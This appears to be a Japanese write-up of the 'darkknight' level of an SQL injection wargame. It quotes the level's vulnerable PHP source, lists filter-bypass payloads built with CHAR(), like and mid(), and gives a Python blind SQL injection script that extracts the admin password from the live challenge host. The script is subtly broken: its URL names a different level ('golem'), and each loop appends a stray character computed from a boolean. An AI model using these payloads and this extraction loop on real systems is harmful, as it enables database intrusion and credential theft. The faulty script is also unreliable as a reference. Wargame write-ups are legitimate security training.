include "./config.php"; login_chk(); $db = dbconnect(); if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; echo "<hr>query : <strong>{$query}</strong><hr><br>"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; $result = @mysqli_fetch_array(mysqli_query($db,$query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); highlight_file(__FILE__);
特徴は以下。
- noとpwを入力する。以下フィルターがある
- noは
prob,_,.,(),',substr,ascii,=
が使えない - pwは
'
が使えない
- noは
- adminのpwを抜き取る必要がある。
これもBlind SQL Injectionを頑張る。
noは大変そうだが、pwも'
が使えないので、noの方に頑張って入れていく。
代用する
こっちは単純な感じ。今までのbypass方法の集大成
0 || id like CHAR(0x61,0x64,0x6d,0x69,0x6e) && {md} < length(pw)
今まではasciiが使えたので、二分探索できた。
今回は使えないので、愚直探索で見つけていこう。
0 || id like CHAR(0x61,0x64,0x6d,0x69,0x6e) && mid(pw,{i+1},1) like char({ord(c)})
import requests url = "https://los.rubiya.kr/chall/golem_4b52asdfasdfef5.php" cookie = {'PHPSESSID': 'eodctasdfasdfasdf5'} def check(data) -> bool: return "Hello admin" in data ok = 0 ng = 30 while ok + 1 != ng: md = (ok + ng) // 2 q = f"0 || id like CHAR(0x61,0x64,0x6d,0x69,0x6e) && {md} < length(pw)" res = requests.get(url, params={'no': q}, cookies=cookie) print(f"[+] try {md}") if check(res.text): ok = md else: ng = md length = ok + 1 print(f"[*] length = {length}") ans = "" for i in range(0, length): for c in "abcdefghijklmnopqrstuvwxyz0123456789_ABCDEFGHIJKLMNOPQRSTUVWXYZ,": q = f"0 || id like CHAR(0x61,0x64,0x6d,0x69,0x6e) && mid(pw,{i+1},1) like char({ord(c)})" res = requests.get(url, params={'no': q}, cookies=cookie) if check(res.text): ans += c ok = True break ans += str(chr(ok + 1)) print(f"[*] {ans}") print(f"[*] find! {ans}")